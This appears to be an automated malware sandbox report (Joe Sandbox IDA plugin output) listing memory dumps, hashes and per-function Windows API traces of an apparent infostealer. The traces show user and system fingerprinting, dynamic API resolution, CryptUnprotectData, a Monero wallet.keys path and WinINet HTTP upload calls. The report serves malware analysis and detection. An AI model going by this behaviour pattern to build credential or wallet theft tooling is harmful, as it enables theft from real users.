Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Local$AllocCryptDataFreeUnprotect
String ID:
API String ID: 2068576380-0
Opcode ID: c59e8817655907270e289adf25a979abe3a41bb6b9a90177e8bfe4db8373fe26
Instruction ID: 73339d38a99aaa2646ecc100f27349e36f3d8739d0dca0474eecef4c6a44f357
Opcode Fuzzy Hash: c59e8817655907270e289adf25a979abe3a41bb6b9a90177e8bfe4db8373fe26
Instruction Fuzzy Hash: DB11F7B8A00209EFDB04DF94D885AAEB7B9FF88300F104558ED19A7350D730AE54CF61

Function 009672F0 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009511B7), ref: 00967320
RtlAllocateHeap.NTDLL(00000000), ref: 00967327
GetUserNameA.ADVAPI32(00000104,00000104), ref: 0096733F

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: Heap$AllocateNameProcessUser
String ID:
API String ID: 1296208442-0
Opcode ID: f53127747dec0920c390c10eb6411cd2d349a180c88267ea0cdde9a7ccb1ae5f
Instruction ID: 218922366015fc5bc5f73c69cb4618569efe3df63d19921d42f64c31a7c2f9de
Opcode Fuzzy Hash: f53127747dec0920c390c10eb6411cd2d349a180c88267ea0cdde9a7ccb1ae5f
Instruction Fuzzy Hash: 60F04FB1944248AFC704DF99DD45FAEFBB8FB44B25F10021AFA19A3680C7745544CBA1

Function 00967970 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(00970DFC), ref: 009679A0
wsprintfA.USER32 ref: 009679B6

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 1a5533cf741f5b3f0b124800bdc283d486cfecfdd710d5af8e4862b4c9ee9c0c
Instruction ID: 8e6aed8a9c906f1521a2bdea559bb9d0b7518f7af83bc41cdc6ab45db430eb0d
Opcode Fuzzy Hash: 1a5533cf741f5b3f0b124800bdc283d486cfecfdd710d5af8e4862b4c9ee9c0c
Instruction Fuzzy Hash: 10F096B2904208EBC714DF89DC45FAAFBBCFB48B14F50466DF51993680D7756904CB90

Function 009695E0 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(75900000,011F68A0), ref: 009695FD
GetProcAddress.KERNEL32(75900000,011F6740), ref: 00969615
GetProcAddress.KERNEL32(75900000,01208F70), ref: 0096962E
GetProcAddress.KERNEL32(75900000,01208F88), ref: 00969646
GetProcAddress.KERNEL32(75900000,0120DCE0), ref: 0096965E
GetProcAddress.KERNEL32(75900000,0120DBF0), ref: 00969677
GetProcAddress.KERNEL32(75900000,011FB108), ref: 0096968F
GetProcAddress.KERNEL32(75900000,0120DD28), ref: 009696A7
GetProcAddress.KERNEL32(75900000,0120DC98), ref: 009696C0
GetProcAddress.KERNEL32(75900000,0120DBC0), ref: 009696D8
GetProcAddress.KERNEL32(75900000,0120DC08), ref: 009696F0
GetProcAddress.KERNEL32(75900000,011F68E0), ref: 00969709
GetProcAddress.KERNEL32(75900000,011F6900), ref: 00969721
GetProcAddress.KERNEL32(75900000,011F6980), ref: 00969739
GetProcAddress.KERNEL32(75900000,011F67A0), ref: 00969752
GetProcAddress.KERNEL32(75900000,0120DE00), ref: 0096976A
GetProcAddress.KERNEL32(75900000,0120DDE8), ref: 00969782
GetProcAddress.KERNEL32(75900000,011FAF78), ref: 0096979B
GetProcAddress.KERNEL32(75900000,011F67C0), ref: 009697B3
GetProcAddress.KERNEL32(75900000,0120DB60), ref: 009697CB
GetProcAddress.KERNEL32(75900000,0120DD40), ref: 009697E4
GetProcAddress.KERNEL32(75900000,0120DD88), ref: 009697FC
GetProcAddress.KERNEL32(75900000,0120DD70), ref: 00969814
GetProcAddress.KERNEL32(75900000,011F67E0), ref: 0096982D
GetProcAddress.KERNEL32(75900000,0120DE18), ref: 00969845
GetProcAddress.KERNEL32(75900000,0120DD10), ref: 0096985D
GetProcAddress.KERNEL32(75900000,0120DB30), ref: 00969876
GetProcAddress.KERNEL32(75900000,0120DCB0), ref: 0096988E
GetProcAddress.KERNEL32(75900000,0120DDB8), ref: 009698A6
GetProcAddress.KERNEL32(75900000,0120DD58), ref: 009698BF
GetProcAddress.KERNEL32(75900000,0120DB78), ref: 009698D7
GetProcAddress.KERNEL32(75900000,0120DB48), ref: 009698EF
GetProcAddress.KERNEL32(75900000,0120DDA0), ref: 00969908
GetProcAddress.KERNEL32(75900000,01209E28), ref: 00969920
GetProcAddress.KERNEL32(75900000,0120DC80), ref: 00969938
GetProcAddress.KERNEL32(75900000,0120DDD0), ref: 00969951
GetProcAddress.KERNEL32(75900000,011F6800), ref: 00969969
GetProcAddress.KERNEL32(75900000,0120DB90), ref: 00969981
GetProcAddress.KERNEL32(75900000,011F69A0), ref: 0096999A
GetProcAddress.KERNEL32(75900000,0120DBA8), ref: 009699B2
GetProcAddress.KERNEL32(75900000,0120DBD8), ref: 009699CA
GetProcAddress.KERNEL32(75900000,011F6380), ref: 009699E3
GetProcAddress.KERNEL32(75900000,011F6540), ref: 009699FB
LoadLibraryA.KERNEL32(0120DC20,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A0D
LoadLibraryA.KERNEL32(0120DC38,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A1E
LoadLibraryA.KERNEL32(0120DC50,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A30
LoadLibraryA.KERNEL32(0120DC68,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A42
LoadLibraryA.KERNEL32(0120DCC8,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A53
LoadLibraryA.KERNEL32(0120DCF8,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A65
LoadLibraryA.KERNEL32(0120DF80,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A77
LoadLibraryA.KERNEL32(0120DF50,?,00965783,00970AD2,?,?,?,?,?,?,?,?,?,?,00970ACF,00970ACE), ref: 00969A88
GetProcAddress.KERNEL32(75FD0000,011F6500), ref: 00969AAA
GetProcAddress.KERNEL32(75FD0000,0120DFB0), ref: 00969AC2
GetProcAddress.KERNEL32(75FD0000,01208810), ref: 00969ADA
GetProcAddress.KERNEL32(75FD0000,0120DF20), ref: 00969AF3
GetProcAddress.KERNEL32(75FD0000,011F6560), ref: 00969B0B
GetProcAddress.KERNEL32(73480000,011FB180), ref: 00969B30
GetProcAddress.KERNEL32(73480000,011F6640), ref: 00969B49
GetProcAddress.KERNEL32(73480000,011FB130), ref: 00969B61
GetProcAddress.KERNEL32(73480000,0120DE60), ref: 00969B79
GetProcAddress.KERNEL32(73480000,0120DF38), ref: 00969B92
GetProcAddress.KERNEL32(73480000,011F6520), ref: 00969BAA
GetProcAddress.KERNEL32(73480000,011F6340), ref: 00969BC2
GetProcAddress.KERNEL32(73480000,0120DF68), ref: 00969BDB
GetProcAddress.KERNEL32(763B0000,011F6460), ref: 00969BFC
GetProcAddress.KERNEL32(763B0000,011F63E0), ref: 00969C14
GetProcAddress.KERNEL32(763B0000,0120DF98), ref: 00969C2D
GetProcAddress.KERNEL32(763B0000,0120DE48), ref: 00969C45
GetProcAddress.KERNEL32(763B0000,011F65A0), ref: 00969C5D
GetProcAddress.KERNEL32(750F0000,011FB090), ref: 00969C83
GetProcAddress.KERNEL32(750F0000,011FB158), ref: 00969C9B
GetProcAddress.KERNEL32(750F0000,0120DEF0), ref: 00969CB3
GetProcAddress.KERNEL32(750F0000,011F62E0), ref: 00969CCC
GetProcAddress.KERNEL32(750F0000,011F6660), ref: 00969CE4
GetProcAddress.KERNEL32(750F0000,011FB2C0), ref: 00969CFC
GetProcAddress.KERNEL32(75A50000,0120DEC0), ref: 00969D22
GetProcAddress.KERNEL32(75A50000,011F63C0), ref: 00969D3A
GetProcAddress.KERNEL32(75A50000,01208920), ref: 00969D52
GetProcAddress.KERNEL32(75A50000,0120DFC8), ref: 00969D6B
GetProcAddress.KERNEL32(75A50000,0120DFE0), ref: 00969D83
GetProcAddress.KERNEL32(75A50000,011F6580), ref: 00969D9B
GetProcAddress.KERNEL32(75A50000,011F62A0), ref: 00969DB4
GetProcAddress.KERNEL32(75A50000,0120DE30), ref: 00969DCC
GetProcAddress.KERNEL32(75A50000,0120DF08), ref: 00969DE4
GetProcAddress.KERNEL32(75070000,011F6400), ref: 00969E06
GetProcAddress.KERNEL32(75070000,0120DE78), ref: 00969E1E
GetProcAddress.KERNEL32(75070000,0120DE90), ref: 00969E36
GetProcAddress.KERNEL32(75070000,0120DEA8), ref: 00969E4F
GetProcAddress.KERNEL32(75070000,0120DED8), ref: 00969E67
GetProcAddress.KERNEL32(74E50000,011F6360), ref: 00969E88
GetProcAddress.KERNEL32(74E50000,011F65C0), ref: 00969EA1
GetProcAddress.KERNEL32(75320000,011F63A0), ref: 00969EC2
GetProcAddress.KERNEL32(75320000,0120D878), ref: 00969EDA
GetProcAddress.KERNEL32(6F080000,011F65E0), ref: 00969F00
GetProcAddress.KERNEL32(6F080000,011F6420), ref: 00969F18
GetProcAddress.KERNEL32(6F080000,011F6280), ref: 00969F30
GetProcAddress.KERNEL32(6F080000,0120D968), ref: 00969F49
GetProcAddress.KERNEL32(6F080000,011F62C0), ref: 00969F61
GetProcAddress.KERNEL32(6F080000,011F6600), ref: 00969F79
GetProcAddress.KERNEL32(6F080000,011F6300), ref: 00969F92
GetProcAddress.KERNEL32(6F080000,011F6320), ref: 00969FAA
GetProcAddress.KERNEL32(6F080000,InternetSetOptionA), ref: 00969FC1
GetProcAddress.KERNEL32(6F080000,HttpQueryInfoA), ref: 00969FD7
GetProcAddress.KERNEL32(74E00000,0120D908), ref: 00969FF9
GetProcAddress.KERNEL32(74E00000,01208940), ref: 0096A011
GetProcAddress.KERNEL32(74E00000,0120DA28), ref: 0096A029
GetProcAddress.KERNEL32(74E00000,0120DA10), ref: 0096A042
GetProcAddress.KERNEL32(74DF0000,011F6440), ref: 0096A063
GetProcAddress.KERNEL32(6F9C0000,0120D8D8), ref: 0096A084
GetProcAddress.KERNEL32(6F9C0000,011F6480), ref: 0096A09D
GetProcAddress.KERNEL32(6F9C0000,0120DAE8), ref: 0096A0B5
GetProcAddress.KERNEL32(6F9C0000,0120D9E0), ref: 0096A0CD

Strings

InternetSetOptionA, xrefs: 00969FB5
HttpQueryInfoA, xrefs: 00969FCC

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: e1fcd0cb843c91bd44452016823dfcced22e84808d77432b0808d7c546da7d22
Instruction ID: 7c4583cdc726e9a644993354de33cd92fccaddbc1302081cf40b6474f23d7706
Opcode Fuzzy Hash: e1fcd0cb843c91bd44452016823dfcced22e84808d77432b0808d7c546da7d22
Instruction Fuzzy Hash: EA621CB6504200EFC754DFA8EC98D1A3FBABB8C681750951EE60DCB264DF34A8C5DB64

Function 00957750 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00957764
RtlAllocateHeap.NTDLL(00000000), ref: 0095776B
lstrcat.KERNEL32(?,0120F070), ref: 0095791B
lstrcat.KERNEL32(?,?), ref: 0095792F
lstrcat.KERNEL32(?,?), ref: 00957943
lstrcat.KERNEL32(?,?), ref: 00957957
lstrcat.KERNEL32(?,0120EBF8), ref: 0095796B
lstrcat.KERNEL32(?,0120EE38), ref: 0095797F
lstrcat.KERNEL32(?,0120EC10), ref: 00957992
lstrcat.KERNEL32(?,0120ECA0), ref: 009579A6
lstrcat.KERNEL32(?,0120F0F8), ref: 009579BA
lstrcat.KERNEL32(?,?), ref: 009579CE
lstrcat.KERNEL32(?,?), ref: 009579E2
lstrcat.KERNEL32(?,?), ref: 009579F6
lstrcat.KERNEL32(?,0120EBF8), ref: 00957A09
lstrcat.KERNEL32(?,0120EE38), ref: 00957A1D
lstrcat.KERNEL32(?,0120EC10), ref: 00957A31
lstrcat.KERNEL32(?,0120ECA0), ref: 00957A44
lstrcat.KERNEL32(?,0120F160), ref: 00957A58
lstrcat.KERNEL32(?,?), ref: 00957A6C
lstrcat.KERNEL32(?,?), ref: 00957A80
lstrcat.KERNEL32(?,?), ref: 00957A94
lstrcat.KERNEL32(?,0120EBF8), ref: 00957AA8
lstrcat.KERNEL32(?,0120EE38), ref: 00957ABB
lstrcat.KERNEL32(?,0120EC10), ref: 00957ACF
lstrcat.KERNEL32(?,0120ECA0), ref: 00957AE3
lstrcat.KERNEL32(?,0120F1C8), ref: 00957AF6
lstrcat.KERNEL32(?,?), ref: 00957B0A
lstrcat.KERNEL32(?,?), ref: 00957B1E
lstrcat.KERNEL32(?,?), ref: 00957B32
lstrcat.KERNEL32(?,0120EBF8), ref: 00957B46
lstrcat.KERNEL32(?,0120EE38), ref: 00957B5A
lstrcat.KERNEL32(?,0120EC10), ref: 00957B6D
lstrcat.KERNEL32(?,0120ECA0), ref: 00957B81
lstrcat.KERNEL32(?,0120F230), ref: 00957B95
lstrcat.KERNEL32(?,?), ref: 00957BA9
lstrcat.KERNEL32(?,?), ref: 00957BBD
lstrcat.KERNEL32(?,?), ref: 00957BD1
lstrcat.KERNEL32(?,0120EBF8), ref: 00957BE4
lstrcat.KERNEL32(?,0120EE38), ref: 00957BF8
lstrcat.KERNEL32(?,0120EC10), ref: 00957C0C
lstrcat.KERNEL32(?,0120ECA0), ref: 00957C1F
lstrcat.KERNEL32(?,0120F298), ref: 00957C33
lstrcat.KERNEL32(?,?), ref: 00957C47
lstrcat.KERNEL32(?,?), ref: 00957C5B
lstrcat.KERNEL32(?,?), ref: 00957C6F
lstrcat.KERNEL32(?,0120EBF8), ref: 00957C83
lstrcat.KERNEL32(?,0120EE38), ref: 00957C96
lstrcat.KERNEL32(?,0120EC10), ref: 00957CAA
lstrcat.KERNEL32(?,0120ECA0), ref: 00957CBE

Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,009717A0), ref: 00957646
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,00000000), ref: 00957688
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020, : ), ref: 0095769A
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,00000000), ref: 009576CF
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,009717A8), ref: 009576E0
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,00000000), ref: 00957713
Part of subcall function 00957610: lstrcat.KERNEL32(3586C020,009717AC), ref: 0095772D
Part of subcall function 00957610: task.LIBCPMTD ref: 0095773B

lstrcat.KERNEL32(?,0120F440), ref: 00957E4B
lstrcat.KERNEL32(?,0120E3F8), ref: 00957E5E
lstrlen.KERNEL32(3586C020), ref: 00957E6B
lstrlen.KERNEL32(3586C020), ref: 00957E7B

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

Memory Dump Source

Source File: 00000000.00000002.2264804271.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true

Associated: 00000000.00000002.2264746865.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.000000000098C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.00000000009EF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A21000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000A50000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AD7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264804271.0000000000AFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000D1B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E04000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E26000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E2D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265239812.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265465120.0000000000E3E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265561696.0000000000FDF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265575676.0000000000FE0000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_file.jbxd

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 0e9f608035de11e67ef7fce2a06c9dd64f123e0e2e8dd308199e0b1a511ccac3
Instruction ID: 8ca946f5f62c72e920d5e8a6375a209f5f428750a5f9917bd85a277c513ee557
Opcode Fuzzy Hash: 0e9f608035de11e67ef7fce2a06c9dd64f123e0e2e8dd308199e0b1a511ccac3
Instruction Fuzzy Hash: 8B3232B2910214ABCB55EBA0DC89DDE773CAB48740F448A9DF60E63190DE74A789CF64

Function 00955150 Relevance: 47.8, APIs: 19, Strings: 8, Instructions: 572
stringnetworkmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0096A170: lstrcpy.KERNEL32(?,00000000), ref: 0096A1B6

Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 0095483A
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954852
Part of subcall function 00954800: ??_U@YAPAXI@Z.MSVCRT(00000800), ref: 00954868
Part of subcall function 00954800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00954889
Part of subcall function 00954800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00954899

lstrlen.KERNEL32(00000000), ref: 009551E3

Part of subcall function 00968940: CryptBinaryToStringA.CRYPT32(00000000,009551D4,40000001,00000000,00000000), ref: 00968960

Part of subcall function 0096A110: lstrcpy.KERNEL32(00970DFF,00000000), ref: 0096A158

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00955257
StrCmpCA.SHLWAPI(?,0120F340), ref: 00955275
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00955390
HttpOpenRequestA.WININET(00000000,0120F3F0,?,0120EE20,00000000,00000000,00400100,00000000), ref: 009553F4

Part of subcall function 0096A380: lstrlen.KERNEL32(?,01208B00,?,\Monero\wallet.keys,00970DFF), ref: 0096A395
Part of subcall function 0096A380: lstrcpy.KERNEL32(00000000), ref: 0096A3D4
Part of subcall function 0096A380: lstrcat.KERNEL32(00000000,00000000), ref: 0096A3E2

Part of subcall function 0096A270: lstrcpy.KERNEL32(?,00970DFF), ref: 0096A2D5

Part of subcall function 0096A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0096A342
